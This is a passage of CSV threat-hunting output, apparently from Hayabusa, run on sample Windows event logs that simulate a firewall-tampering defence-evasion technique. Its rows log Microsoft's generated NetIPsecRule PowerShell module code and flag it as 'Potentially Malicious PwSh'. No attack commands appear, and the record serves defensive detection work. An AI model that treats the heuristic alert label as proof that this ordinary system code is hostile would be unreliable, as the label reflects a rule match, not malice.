IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$tr",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ue)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] 
${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmd",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ue)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains 